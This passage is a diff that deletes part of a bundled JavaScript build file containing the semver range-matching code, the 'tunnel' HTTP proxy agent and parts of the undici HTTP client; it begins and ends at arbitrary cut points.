<' + (+M + 1) + '.0.0' - } else if (isX(p)) { - // ~1.2 == >=1.2.0 <1.3.0 - ret = '>=' + M + '.' + m + '.0 <' + M + '.' + (+m + 1) + '.0' - } else if (pr) { - debug('replaceTilde pr', pr) - ret = '>=' + M + '.' + m + '.' + p + '-' + pr + - ' <' + M + '.' + (+m + 1) + '.0' - } else { - // ~1.2.3 == >=1.2.3 <1.3.0 - ret = '>=' + M + '.' + m + '.' + p + - ' <' + M + '.' + (+m + 1) + '.0' - } - - debug('tilde return', ret) - return ret - }) -} - -// ^ --> * (any, kinda silly) -// ^2, ^2.x, ^2.x.x --> >=2.0.0 <3.0.0 -// ^2.0, ^2.0.x --> >=2.0.0 <3.0.0 -// ^1.2, ^1.2.x --> >=1.2.0 <2.0.0 -// ^1.2.3 --> >=1.2.3 <2.0.0 -// ^1.2.0 --> >=1.2.0 <2.0.0 -function replaceCarets (comp, options) { - return comp.trim().split(/\s+/).map(function (comp) { - return replaceCaret(comp, options) - }).join(' ') -} - -function replaceCaret (comp, options) { - debug('caret', comp, options) - var r = options.loose ? safeRe[t.CARETLOOSE] : safeRe[t.CARET] - return comp.replace(r, function (_, M, m, p, pr) { - debug('caret', comp, _, M, m, p, pr) - var ret - - if (isX(M)) { - ret = '' - } else if (isX(m)) { - ret = '>=' + M + '.0.0 <' + (+M + 1) + '.0.0' - } else if (isX(p)) { - if (M === '0') { - ret = '>=' + M + '.' + m + '.0 <' + M + '.' + (+m + 1) + '.0' - } else { - ret = '>=' + M + '.' + m + '.0 <' + (+M + 1) + '.0.0' - } - } else if (pr) { - debug('replaceCaret pr', pr) - if (M === '0') { - if (m === '0') { - ret = '>=' + M + '.' + m + '.' + p + '-' + pr + - ' <' + M + '.' + m + '.' + (+p + 1) - } else { - ret = '>=' + M + '.' + m + '.' + p + '-' + pr + - ' <' + M + '.' + (+m + 1) + '.0' - } - } else { - ret = '>=' + M + '.' + m + '.' + p + '-' + pr + - ' <' + (+M + 1) + '.0.0' - } - } else { - debug('no pr') - if (M === '0') { - if (m === '0') { - ret = '>=' + M + '.' + m + '.' + p + - ' <' + M + '.' + m + '.' + (+p + 1) - } else { - ret = '>=' + M + '.' + m + '.' + p + - ' <' + M + '.' + (+m + 1) + '.0' - } - } else { - ret = '>=' + M + '.' + m + '.' + p + - ' <' + (+M + 1) + '.0.0' - } - } - - debug('caret return', ret) - return ret - }) -} - -function replaceXRanges (comp, options) { - debug('replaceXRanges', comp, options) - return comp.split(/\s+/).map(function (comp) { - return replaceXRange(comp, options) - }).join(' ') -} - -function replaceXRange (comp, options) { - comp = comp.trim() - var r = options.loose ? safeRe[t.XRANGELOOSE] : safeRe[t.XRANGE] - return comp.replace(r, function (ret, gtlt, M, m, p, pr) { - debug('xRange', comp, ret, gtlt, M, m, p, pr) - var xM = isX(M) - var xm = xM || isX(m) - var xp = xm || isX(p) - var anyX = xp - - if (gtlt === '=' && anyX) { - gtlt = '' - } - - // if we're including prereleases in the match, then we need - // to fix this to -0, the lowest possible prerelease value - pr = options.includePrerelease ? '-0' : '' - - if (xM) { - if (gtlt === '>' || gtlt === '<') { - // nothing is allowed - ret = '<0.0.0-0' - } else { - // nothing is forbidden - ret = '*' - } - } else if (gtlt && anyX) { - // we know patch is an x, because we have any x at all. - // replace X with 0 - if (xm) { - m = 0 - } - p = 0 - - if (gtlt === '>') { - // >1 => >=2.0.0 - // >1.2 => >=1.3.0 - // >1.2.3 => >= 1.2.4 - gtlt = '>=' - if (xm) { - M = +M + 1 - m = 0 - p = 0 - } else { - m = +m + 1 - p = 0 - } - } else if (gtlt === '<=') { - // <=0.7.x is actually <0.8.0, since any 0.7.x should - // pass. Similarly, <=7.x is actually <8.0.0, etc. - gtlt = '<' - if (xm) { - M = +M + 1 - } else { - m = +m + 1 - } - } - - ret = gtlt + M + '.' + m + '.' + p + pr - } else if (xm) { - ret = '>=' + M + '.0.0' + pr + ' <' + (+M + 1) + '.0.0' + pr - } else if (xp) { - ret = '>=' + M + '.' + m + '.0' + pr + - ' <' + M + '.' + (+m + 1) + '.0' + pr - } - - debug('xRange return', ret) - - return ret - }) -} - -// Because * is AND-ed with everything else in the comparator, -// and '' means "any version", just remove the *s entirely. -function replaceStars (comp, options) { - debug('replaceStars', comp, options) - // Looseness is ignored here. star is always as loose as it gets! - return comp.trim().replace(safeRe[t.STAR], '') -} - -// This function is passed to string.replace(re[t.HYPHENRANGE]) -// M, m, patch, prerelease, build -// 1.2 - 3.4.5 => >=1.2.0 <=3.4.5 -// 1.2.3 - 3.4 => >=1.2.0 <3.5.0 Any 3.4.x will do -// 1.2 - 3.4 => >=1.2.0 <3.5.0 -function hyphenReplace ($0, - from, fM, fm, fp, fpr, fb, - to, tM, tm, tp, tpr, tb) { - if (isX(fM)) { - from = '' - } else if (isX(fm)) { - from = '>=' + fM + '.0.0' - } else if (isX(fp)) { - from = '>=' + fM + '.' + fm + '.0' - } else { - from = '>=' + from - } - - if (isX(tM)) { - to = '' - } else if (isX(tm)) { - to = '<' + (+tM + 1) + '.0.0' - } else if (isX(tp)) { - to = '<' + tM + '.' + (+tm + 1) + '.0' - } else if (tpr) { - to = '<=' + tM + '.' + tm + '.' + tp + '-' + tpr - } else { - to = '<=' + to - } - - return (from + ' ' + to).trim() -} - -// if ANY of the sets match ALL of its comparators, then pass -Range.prototype.test = function (version) { - if (!version) { - return false - } - - if (typeof version === 'string') { - try { - version = new SemVer(version, this.options) - } catch (er) { - return false - } - } - - for (var i = 0; i < this.set.length; i++) { - if (testSet(this.set[i], version, this.options)) { - return true - } - } - return false -} - -function testSet (set, version, options) { - for (var i = 0; i < set.length; i++) { - if (!set[i].test(version)) { - return false - } - } - - if (version.prerelease.length && !options.includePrerelease) { - // Find the set of versions that are allowed to have prereleases - // For example, ^1.2.3-pr.1 desugars to >=1.2.3-pr.1 <2.0.0 - // That should allow `1.2.3-pr.2` to pass. - // However, `1.2.4-alpha.notready` should NOT be allowed, - // even though it's within the range set by the comparators. - for (i = 0; i < set.length; i++) { - debug(set[i].semver) - if (set[i].semver === ANY) { - continue - } - - if (set[i].semver.prerelease.length > 0) { - var allowed = set[i].semver - if (allowed.major === version.major && - allowed.minor === version.minor && - allowed.patch === version.patch) { - return true - } - } - } - - // Version has a -pre, but it's not one of the ones we like. - return false - } - - return true -} - -exports.satisfies = satisfies -function satisfies (version, range, options) { - try { - range = new Range(range, options) - } catch (er) { - return false - } - return range.test(version) -} - -exports.maxSatisfying = maxSatisfying -function maxSatisfying (versions, range, options) { - var max = null - var maxSV = null - try { - var rangeObj = new Range(range, options) - } catch (er) { - return null - } - versions.forEach(function (v) { - if (rangeObj.test(v)) { - // satisfies(v, range, options) - if (!max || maxSV.compare(v) === -1) { - // compare(max, v, true) - max = v - maxSV = new SemVer(max, options) - } - } - }) - return max -} - -exports.minSatisfying = minSatisfying -function minSatisfying (versions, range, options) { - var min = null - var minSV = null - try { - var rangeObj = new Range(range, options) - } catch (er) { - return null - } - versions.forEach(function (v) { - if (rangeObj.test(v)) { - // satisfies(v, range, options) - if (!min || minSV.compare(v) === 1) { - // compare(min, v, true) - min = v - minSV = new SemVer(min, options) - } - } - }) - return min -} - -exports.minVersion = minVersion -function minVersion (range, loose) { - range = new Range(range, loose) - - var minver = new SemVer('0.0.0') - if (range.test(minver)) { - return minver - } - - minver = new SemVer('0.0.0-0') - if (range.test(minver)) { - return minver - } - - minver = null - for (var i = 0; i < range.set.length; ++i) { - var comparators = range.set[i] - - comparators.forEach(function (comparator) { - // Clone to avoid manipulating the comparator's semver object. - var compver = new SemVer(comparator.semver.version) - switch (comparator.operator) { - case '>': - if (compver.prerelease.length === 0) { - compver.patch++ - } else { - compver.prerelease.push(0) - } - compver.raw = compver.format() - /* fallthrough */ - case '': - case '>=': - if (!minver || gt(minver, compver)) { - minver = compver - } - break - case '<': - case '<=': - /* Ignore maximum versions */ - break - /* istanbul ignore next */ - default: - throw new Error('Unexpected operation: ' + comparator.operator) - } - }) - } - - if (minver && range.test(minver)) { - return minver - } - - return null -} - -exports.validRange = validRange -function validRange (range, options) { - try { - // Return '*' instead of '' so that truthiness works. - // This will throw if it's invalid anyway - return new Range(range, options).range || '*' - } catch (er) { - return null - } -} - -// Determine if version is less than all the versions possible in the range -exports.ltr = ltr -function ltr (version, range, options) { - return outside(version, range, '<', options) -} - -// Determine if version is greater than all the versions possible in the range. -exports.gtr = gtr -function gtr (version, range, options) { - return outside(version, range, '>', options) -} - -exports.outside = outside -function outside (version, range, hilo, options) { - version = new SemVer(version, options) - range = new Range(range, options) - - var gtfn, ltefn, ltfn, comp, ecomp - switch (hilo) { - case '>': - gtfn = gt - ltefn = lte - ltfn = lt - comp = '>' - ecomp = '>=' - break - case '<': - gtfn = lt - ltefn = gte - ltfn = gt - comp = '<' - ecomp = '<=' - break - default: - throw new TypeError('Must provide a hilo val of "<" or ">"') - } - - // If it satisifes the range it is not outside - if (satisfies(version, range, options)) { - return false - } - - // From now on, variable terms are as if we're in "gtr" mode. - // but note that everything is flipped for the "ltr" function. - - for (var i = 0; i < range.set.length; ++i) { - var comparators = range.set[i] - - var high = null - var low = null - - comparators.forEach(function (comparator) { - if (comparator.semver === ANY) { - comparator = new Comparator('>=0.0.0') - } - high = high || comparator - low = low || comparator - if (gtfn(comparator.semver, high.semver, options)) { - high = comparator - } else if (ltfn(comparator.semver, low.semver, options)) { - low = comparator - } - }) - - // If the edge version comparator has a operator then our version - // isn't outside it - if (high.operator === comp || high.operator === ecomp) { - return false - } - - // If the lowest version comparator has an operator and our version - // is less than it then it isn't higher than the range - if ((!low.operator || low.operator === comp) && - ltefn(version, low.semver)) { - return false - } else if (low.operator === ecomp && ltfn(version, low.semver)) { - return false - } - } - return true -} - -exports.prerelease = prerelease -function prerelease (version, options) { - var parsed = parse(version, options) - return (parsed && parsed.prerelease.length) ? parsed.prerelease : null -} - -exports.intersects = intersects -function intersects (r1, r2, options) { - r1 = new Range(r1, options) - r2 = new Range(r2, options) - return r1.intersects(r2) -} - -exports.coerce = coerce -function coerce (version, options) { - if (version instanceof SemVer) { - return version - } - - if (typeof version === 'number') { - version = String(version) - } - - if (typeof version !== 'string') { - return null - } - - options = options || {} - - var match = null - if (!options.rtl) { - match = version.match(safeRe[t.COERCE]) - } else { - // Find the right-most coercible string that does not share - // a terminus with a more left-ward coercible string. - // Eg, '1.2.3.4' wants to coerce '2.3.4', not '3.4' or '4' - // - // Walk through the string checking with a /g regexp - // Manually set the index so as to pick up overlapping matches. - // Stop when we get a match that ends at the string end, since no - // coercible string can be more right-ward without the same terminus. - var next - while ((next = safeRe[t.COERCERTL].exec(version)) && - (!match || match.index + match[0].length !== version.length) - ) { - if (!match || - next.index + next[0].length !== match.index + match[0].length) { - match = next - } - safeRe[t.COERCERTL].lastIndex = next.index + next[1].length + next[2].length - } - // leave it in a clean state - safeRe[t.COERCERTL].lastIndex = -1 - } - - if (match === null) { - return null - } - - return parse(match[2] + - '.' + (match[3] || '0') + - '.' + (match[4] || '0'), options) -} - - -/***/ }), - -/***/ 4294: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -module.exports = __nccwpck_require__(4219); - - -/***/ }), - -/***/ 4219: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -var net = __nccwpck_require__(1808); -var tls = __nccwpck_require__(4404); -var http = __nccwpck_require__(3685); -var https = __nccwpck_require__(5687); -var events = __nccwpck_require__(2361); -var assert = __nccwpck_require__(9491); -var util = __nccwpck_require__(3837); - - -exports.httpOverHttp = httpOverHttp; -exports.httpsOverHttp = httpsOverHttp; -exports.httpOverHttps = httpOverHttps; -exports.httpsOverHttps = httpsOverHttps; - - -function httpOverHttp(options) { - var agent = new TunnelingAgent(options); - agent.request = http.request; - return agent; -} - -function httpsOverHttp(options) { - var agent = new TunnelingAgent(options); - agent.request = http.request; - agent.createSocket = createSecureSocket; - agent.defaultPort = 443; - return agent; -} - -function httpOverHttps(options) { - var agent = new TunnelingAgent(options); - agent.request = https.request; - return agent; -} - -function httpsOverHttps(options) { - var agent = new TunnelingAgent(options); - agent.request = https.request; - agent.createSocket = createSecureSocket; - agent.defaultPort = 443; - return agent; -} - - -function TunnelingAgent(options) { - var self = this; - self.options = options || {}; - self.proxyOptions = self.options.proxy || {}; - self.maxSockets = self.options.maxSockets || http.Agent.defaultMaxSockets; - self.requests = []; - self.sockets = []; - - self.on('free', function onFree(socket, host, port, localAddress) { - var options = toOptions(host, port, localAddress); - for (var i = 0, len = self.requests.length; i < len; ++i) { - var pending = self.requests[i]; - if (pending.host === options.host && pending.port === options.port) { - // Detect the request to connect same origin server, - // reuse the connection. - self.requests.splice(i, 1); - pending.request.onSocket(socket); - return; - } - } - socket.destroy(); - self.removeSocket(socket); - }); -} -util.inherits(TunnelingAgent, events.EventEmitter); - -TunnelingAgent.prototype.addRequest = function addRequest(req, host, port, localAddress) { - var self = this; - var options = mergeOptions({request: req}, self.options, toOptions(host, port, localAddress)); - - if (self.sockets.length >= this.maxSockets) { - // We are over limit so we'll add it to the queue. - self.requests.push(options); - return; - } - - // If we are under maxSockets create a new one. - self.createSocket(options, function(socket) { - socket.on('free', onFree); - socket.on('close', onCloseOrRemove); - socket.on('agentRemove', onCloseOrRemove); - req.onSocket(socket); - - function onFree() { - self.emit('free', socket, options); - } - - function onCloseOrRemove(err) { - self.removeSocket(socket); - socket.removeListener('free', onFree); - socket.removeListener('close', onCloseOrRemove); - socket.removeListener('agentRemove', onCloseOrRemove); - } - }); -}; - -TunnelingAgent.prototype.createSocket = function createSocket(options, cb) { - var self = this; - var placeholder = {}; - self.sockets.push(placeholder); - - var connectOptions = mergeOptions({}, self.proxyOptions, { - method: 'CONNECT', - path: options.host + ':' + options.port, - agent: false, - headers: { - host: options.host + ':' + options.port - } - }); - if (options.localAddress) { - connectOptions.localAddress = options.localAddress; - } - if (connectOptions.proxyAuth) { - connectOptions.headers = connectOptions.headers || {}; - connectOptions.headers['Proxy-Authorization'] = 'Basic ' + - new Buffer(connectOptions.proxyAuth).toString('base64'); - } - - debug('making CONNECT request'); - var connectReq = self.request(connectOptions); - connectReq.useChunkedEncodingByDefault = false; // for v0.6 - connectReq.once('response', onResponse); // for v0.6 - connectReq.once('upgrade', onUpgrade); // for v0.6 - connectReq.once('connect', onConnect); // for v0.7 or later - connectReq.once('error', onError); - connectReq.end(); - - function onResponse(res) { - // Very hacky. This is necessary to avoid http-parser leaks. - res.upgrade = true; - } - - function onUpgrade(res, socket, head) { - // Hacky. - process.nextTick(function() { - onConnect(res, socket, head); - }); - } - - function onConnect(res, socket, head) { - connectReq.removeAllListeners(); - socket.removeAllListeners(); - - if (res.statusCode !== 200) { - debug('tunneling socket could not be established, statusCode=%d', - res.statusCode); - socket.destroy(); - var error = new Error('tunneling socket could not be established, ' + - 'statusCode=' + res.statusCode); - error.code = 'ECONNRESET'; - options.request.emit('error', error); - self.removeSocket(placeholder); - return; - } - if (head.length > 0) { - debug('got illegal response body from proxy'); - socket.destroy(); - var error = new Error('got illegal response body from proxy'); - error.code = 'ECONNRESET'; - options.request.emit('error', error); - self.removeSocket(placeholder); - return; - } - debug('tunneling connection has established'); - self.sockets[self.sockets.indexOf(placeholder)] = socket; - return cb(socket); - } - - function onError(cause) { - connectReq.removeAllListeners(); - - debug('tunneling socket could not be established, cause=%s\n', - cause.message, cause.stack); - var error = new Error('tunneling socket could not be established, ' + - 'cause=' + cause.message); - error.code = 'ECONNRESET'; - options.request.emit('error', error); - self.removeSocket(placeholder); - } -}; - -TunnelingAgent.prototype.removeSocket = function removeSocket(socket) { - var pos = this.sockets.indexOf(socket) - if (pos === -1) { - return; - } - this.sockets.splice(pos, 1); - - var pending = this.requests.shift(); - if (pending) { - // If we have pending requests and a socket gets closed a new one - // needs to be created to take over in the pool for the one that closed. - this.createSocket(pending, function(socket) { - pending.request.onSocket(socket); - }); - } -}; - -function createSecureSocket(options, cb) { - var self = this; - TunnelingAgent.prototype.createSocket.call(self, options, function(socket) { - var hostHeader = options.request.getHeader('host'); - var tlsOptions = mergeOptions({}, self.options, { - socket: socket, - servername: hostHeader ? hostHeader.replace(/:.*$/, '') : options.host - }); - - // 0 is dummy port for v0.6 - var secureSocket = tls.connect(0, tlsOptions); - self.sockets[self.sockets.indexOf(socket)] = secureSocket; - cb(secureSocket); - }); -} - - -function toOptions(host, port, localAddress) { - if (typeof host === 'string') { // since v0.10 - return { - host: host, - port: port, - localAddress: localAddress - }; - } - return host; // for v0.11 or later -} - -function mergeOptions(target) { - for (var i = 1, len = arguments.length; i < len; ++i) { - var overrides = arguments[i]; - if (typeof overrides === 'object') { - var keys = Object.keys(overrides); - for (var j = 0, keyLen = keys.length; j < keyLen; ++j) { - var k = keys[j]; - if (overrides[k] !== undefined) { - target[k] = overrides[k]; - } - } - } - } - return target; -} - - -var debug; -if (process.env.NODE_DEBUG && /\btunnel\b/.test(process.env.NODE_DEBUG)) { - debug = function() { - var args = Array.prototype.slice.call(arguments); - if (typeof args[0] === 'string') { - args[0] = 'TUNNEL: ' + args[0]; - } else { - args.unshift('TUNNEL:'); - } - console.error.apply(console, args); - } -} else { - debug = function() {}; -} -exports.debug = debug; // for test - - -/***/ }), - -/***/ 1773: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const Client = __nccwpck_require__(3598) -const Dispatcher = __nccwpck_require__(412) -const errors = __nccwpck_require__(8045) -const Pool = __nccwpck_require__(4634) -const BalancedPool = __nccwpck_require__(7931) -const Agent = __nccwpck_require__(7890) -const util = __nccwpck_require__(3983) -const { InvalidArgumentError } = errors -const api = __nccwpck_require__(4059) -const buildConnector = __nccwpck_require__(2067) -const MockClient = __nccwpck_require__(8687) -const MockAgent = __nccwpck_require__(6771) -const MockPool = __nccwpck_require__(6193) -const mockErrors = __nccwpck_require__(888) -const ProxyAgent = __nccwpck_require__(7858) -const RetryHandler = __nccwpck_require__(2286) -const { getGlobalDispatcher, setGlobalDispatcher } = __nccwpck_require__(1892) -const DecoratorHandler = __nccwpck_require__(6930) -const RedirectHandler = __nccwpck_require__(2860) -const createRedirectInterceptor = __nccwpck_require__(8861) - -let hasCrypto -try { - __nccwpck_require__(6113) - hasCrypto = true -} catch { - hasCrypto = false -} - -Object.assign(Dispatcher.prototype, api) - -module.exports.Dispatcher = Dispatcher -module.exports.Client = Client -module.exports.Pool = Pool -module.exports.BalancedPool = BalancedPool -module.exports.Agent = Agent -module.exports.ProxyAgent = ProxyAgent -module.exports.RetryHandler = RetryHandler - -module.exports.DecoratorHandler = DecoratorHandler -module.exports.RedirectHandler = RedirectHandler -module.exports.createRedirectInterceptor = createRedirectInterceptor - -module.exports.buildConnector = buildConnector -module.exports.errors = errors - -function makeDispatcher (fn) { - return (url, opts, handler) => { - if (typeof opts === 'function') { - handler = opts - opts = null - } - - if (!url || (typeof url !== 'string' && typeof url !== 'object' && !(url instanceof URL))) { - throw new InvalidArgumentError('invalid url') - } - - if (opts != null && typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - if (opts && opts.path != null) { - if (typeof opts.path !== 'string') { - throw new InvalidArgumentError('invalid opts.path') - } - - let path = opts.path - if (!opts.path.startsWith('/')) { - path = `/${path}` - } - - url = new URL(util.parseOrigin(url).origin + path) - } else { - if (!opts) { - opts = typeof url === 'object' ? url : {} - } - - url = util.parseURL(url) - } - - const { agent, dispatcher = getGlobalDispatcher() } = opts - - if (agent) { - throw new InvalidArgumentError('unsupported opts.agent. Did you mean opts.client?') - } - - return fn.call(dispatcher, { - ...opts, - origin: url.origin, - path: url.search ? `${url.pathname}${url.search}` : url.pathname, - method: opts.method || (opts.body ? 'PUT' : 'GET') - }, handler) - } -} - -module.exports.setGlobalDispatcher = setGlobalDispatcher -module.exports.getGlobalDispatcher = getGlobalDispatcher - -if (util.nodeMajor > 16 || (util.nodeMajor === 16 && util.nodeMinor >= 8)) { - let fetchImpl = null - module.exports.fetch = async function fetch (resource) { - if (!fetchImpl) { - fetchImpl = (__nccwpck_require__(4881).fetch) - } - - try { - return await fetchImpl(...arguments) - } catch (err) { - if (typeof err === 'object') { - Error.captureStackTrace(err, this) - } - - throw err - } - } - module.exports.Headers = __nccwpck_require__(554).Headers - module.exports.Response = __nccwpck_require__(7823).Response - module.exports.Request = __nccwpck_require__(8359).Request - module.exports.FormData = __nccwpck_require__(2015).FormData - module.exports.File = __nccwpck_require__(8511).File - module.exports.FileReader = __nccwpck_require__(1446).FileReader - - const { setGlobalOrigin, getGlobalOrigin } = __nccwpck_require__(1246) - - module.exports.setGlobalOrigin = setGlobalOrigin - module.exports.getGlobalOrigin = getGlobalOrigin - - const { CacheStorage } = __nccwpck_require__(7907) - const { kConstruct } = __nccwpck_require__(9174) - - // Cache & CacheStorage are tightly coupled with fetch. Even if it may run - // in an older version of Node, it doesn't have any use without fetch. - module.exports.caches = new CacheStorage(kConstruct) -} - -if (util.nodeMajor >= 16) { - const { deleteCookie, getCookies, getSetCookies, setCookie } = __nccwpck_require__(1724) - - module.exports.deleteCookie = deleteCookie - module.exports.getCookies = getCookies - module.exports.getSetCookies = getSetCookies - module.exports.setCookie = setCookie - - const { parseMIMEType, serializeAMimeType } = __nccwpck_require__(685) - - module.exports.parseMIMEType = parseMIMEType - module.exports.serializeAMimeType = serializeAMimeType -} - -if (util.nodeMajor >= 18 && hasCrypto) { - const { WebSocket } = __nccwpck_require__(4284) - - module.exports.WebSocket = WebSocket -} - -module.exports.request = makeDispatcher(api.request) -module.exports.stream = makeDispatcher(api.stream) -module.exports.pipeline = makeDispatcher(api.pipeline) -module.exports.connect = makeDispatcher(api.connect) -module.exports.upgrade = makeDispatcher(api.upgrade) - -module.exports.MockClient = MockClient -module.exports.MockPool = MockPool -module.exports.MockAgent = MockAgent -module.exports.mockErrors = mockErrors - - -/***/ }), - -/***/ 7890: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { InvalidArgumentError } = __nccwpck_require__(8045) -const { kClients, kRunning, kClose, kDestroy, kDispatch, kInterceptors } = __nccwpck_require__(2785) -const DispatcherBase = __nccwpck_require__(4839) -const Pool = __nccwpck_require__(4634) -const Client = __nccwpck_require__(3598) -const util = __nccwpck_require__(3983) -const createRedirectInterceptor = __nccwpck_require__(8861) -const { WeakRef, FinalizationRegistry } = __nccwpck_require__(6436)() - -const kOnConnect = Symbol('onConnect') -const kOnDisconnect = Symbol('onDisconnect') -const kOnConnectionError = Symbol('onConnectionError') -const kMaxRedirections = Symbol('maxRedirections') -const kOnDrain = Symbol('onDrain') -const kFactory = Symbol('factory') -const kFinalizer = Symbol('finalizer') -const kOptions = Symbol('options') - -function defaultFactory (origin, opts) { - return opts && opts.connections === 1 - ? new Client(origin, opts) - : new Pool(origin, opts) -} - -class Agent extends DispatcherBase { - constructor ({ factory = defaultFactory, maxRedirections = 0, connect, ...options } = {}) { - super() - - if (typeof factory !== 'function') { - throw new InvalidArgumentError('factory must be a function.') - } - - if (connect != null && typeof connect !== 'function' && typeof connect !== 'object') { - throw new InvalidArgumentError('connect must be a function or an object') - } - - if (!Number.isInteger(maxRedirections) || maxRedirections < 0) { - throw new InvalidArgumentError('maxRedirections must be a positive number') - } - - if (connect && typeof connect !== 'function') { - connect = { ...connect } - } - - this[kInterceptors] = options.interceptors && options.interceptors.Agent && Array.isArray(options.interceptors.Agent) - ? options.interceptors.Agent - : [createRedirectInterceptor({ maxRedirections })] - - this[kOptions] = { ...util.deepClone(options), connect } - this[kOptions].interceptors = options.interceptors - ? { ...options.interceptors } - : undefined - this[kMaxRedirections] = maxRedirections - this[kFactory] = factory - this[kClients] = new Map() - this[kFinalizer] = new FinalizationRegistry(/* istanbul ignore next: gc is undeterministic */ key => { - const ref = this[kClients].get(key) - if (ref !== undefined && ref.deref() === undefined) { - this[kClients].delete(key) - } - }) - - const agent = this - - this[kOnDrain] = (origin, targets) => { - agent.emit('drain', origin, [agent, ...targets]) - } - - this[kOnConnect] = (origin, targets) => { - agent.emit('connect', origin, [agent, ...targets]) - } - - this[kOnDisconnect] = (origin, targets, err) => { - agent.emit('disconnect', origin, [agent, ...targets], err) - } - - this[kOnConnectionError] = (origin, targets, err) => { - agent.emit('connectionError', origin, [agent, ...targets], err) - } - } - - get [kRunning] () { - let ret = 0 - for (const ref of this[kClients].values()) { - const client = ref.deref() - /* istanbul ignore next: gc is undeterministic */ - if (client) { - ret += client[kRunning] - } - } - return ret - } - - [kDispatch] (opts, handler) { - let key - if (opts.origin && (typeof opts.origin === 'string' || opts.origin instanceof URL)) { - key = String(opts.origin) - } else { - throw new InvalidArgumentError('opts.origin must be a non-empty string or URL.') - } - - const ref = this[kClients].get(key) - - let dispatcher = ref ? ref.deref() : null - if (!dispatcher) { - dispatcher = this[kFactory](opts.origin, this[kOptions]) - .on('drain', this[kOnDrain]) - .on('connect', this[kOnConnect]) - .on('disconnect', this[kOnDisconnect]) - .on('connectionError', this[kOnConnectionError]) - - this[kClients].set(key, new WeakRef(dispatcher)) - this[kFinalizer].register(dispatcher, key) - } - - return dispatcher.dispatch(opts, handler) - } - - async [kClose] () { - const closePromises = [] - for (const ref of this[kClients].values()) { - const client = ref.deref() - /* istanbul ignore else: gc is undeterministic */ - if (client) { - closePromises.push(client.close()) - } - } - - await Promise.all(closePromises) - } - - async [kDestroy] (err) { - const destroyPromises = [] - for (const ref of this[kClients].values()) { - const client = ref.deref() - /* istanbul ignore else: gc is undeterministic */ - if (client) { - destroyPromises.push(client.destroy(err)) - } - } - - await Promise.all(destroyPromises) - } -} - -module.exports = Agent - - -/***/ }), - -/***/ 7032: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -const { addAbortListener } = __nccwpck_require__(3983) -const { RequestAbortedError } = __nccwpck_require__(8045) - -const kListener = Symbol('kListener') -const kSignal = Symbol('kSignal') - -function abort (self) { - if (self.abort) { - self.abort() - } else { - self.onError(new RequestAbortedError()) - } -} - -function addSignal (self, signal) { - self[kSignal] = null - self[kListener] = null - - if (!signal) { - return - } - - if (signal.aborted) { - abort(self) - return - } - - self[kSignal] = signal - self[kListener] = () => { - abort(self) - } - - addAbortListener(self[kSignal], self[kListener]) -} - -function removeSignal (self) { - if (!self[kSignal]) { - return - } - - if ('removeEventListener' in self[kSignal]) { - self[kSignal].removeEventListener('abort', self[kListener]) - } else { - self[kSignal].removeListener('abort', self[kListener]) - } - - self[kSignal] = null - self[kListener] = null -} - -module.exports = { - addSignal, - removeSignal -} - - -/***/ }), - -/***/ 9744: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { AsyncResource } = __nccwpck_require__(852) -const { InvalidArgumentError, RequestAbortedError, SocketError } = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { addSignal, removeSignal } = __nccwpck_require__(7032) - -class ConnectHandler extends AsyncResource { - constructor (opts, callback) { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - const { signal, opaque, responseHeaders } = opts - - if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { - throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') - } - - super('UNDICI_CONNECT') - - this.opaque = opaque || null - this.responseHeaders = responseHeaders || null - this.callback = callback - this.abort = null - - addSignal(this, signal) - } - - onConnect (abort, context) { - if (!this.callback) { - throw new RequestAbortedError() - } - - this.abort = abort - this.context = context - } - - onHeaders () { - throw new SocketError('bad connect', null) - } - - onUpgrade (statusCode, rawHeaders, socket) { - const { callback, opaque, context } = this - - removeSignal(this) - - this.callback = null - - let headers = rawHeaders - // Indicates is an HTTP2Session - if (headers != null) { - headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) - } - - this.runInAsyncScope(callback, null, null, { - statusCode, - headers, - socket, - opaque, - context - }) - } - - onError (err) { - const { callback, opaque } = this - - removeSignal(this) - - if (callback) { - this.callback = null - queueMicrotask(() => { - this.runInAsyncScope(callback, null, err, { opaque }) - }) - } - } -} - -function connect (opts, callback) { - if (callback === undefined) { - return new Promise((resolve, reject) => { - connect.call(this, opts, (err, data) => { - return err ? reject(err) : resolve(data) - }) - }) - } - - try { - const connectHandler = new ConnectHandler(opts, callback) - this.dispatch({ ...opts, method: 'CONNECT' }, connectHandler) - } catch (err) { - if (typeof callback !== 'function') { - throw err - } - const opaque = opts && opts.opaque - queueMicrotask(() => callback(err, { opaque })) - } -} - -module.exports = connect - - -/***/ }), - -/***/ 8752: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { - Readable, - Duplex, - PassThrough -} = __nccwpck_require__(2781) -const { - InvalidArgumentError, - InvalidReturnValueError, - RequestAbortedError -} = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { AsyncResource } = __nccwpck_require__(852) -const { addSignal, removeSignal } = __nccwpck_require__(7032) -const assert = __nccwpck_require__(9491) - -const kResume = Symbol('resume') - -class PipelineRequest extends Readable { - constructor () { - super({ autoDestroy: true }) - - this[kResume] = null - } - - _read () { - const { [kResume]: resume } = this - - if (resume) { - this[kResume] = null - resume() - } - } - - _destroy (err, callback) { - this._read() - - callback(err) - } -} - -class PipelineResponse extends Readable { - constructor (resume) { - super({ autoDestroy: true }) - this[kResume] = resume - } - - _read () { - this[kResume]() - } - - _destroy (err, callback) { - if (!err && !this._readableState.endEmitted) { - err = new RequestAbortedError() - } - - callback(err) - } -} - -class PipelineHandler extends AsyncResource { - constructor (opts, handler) { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - if (typeof handler !== 'function') { 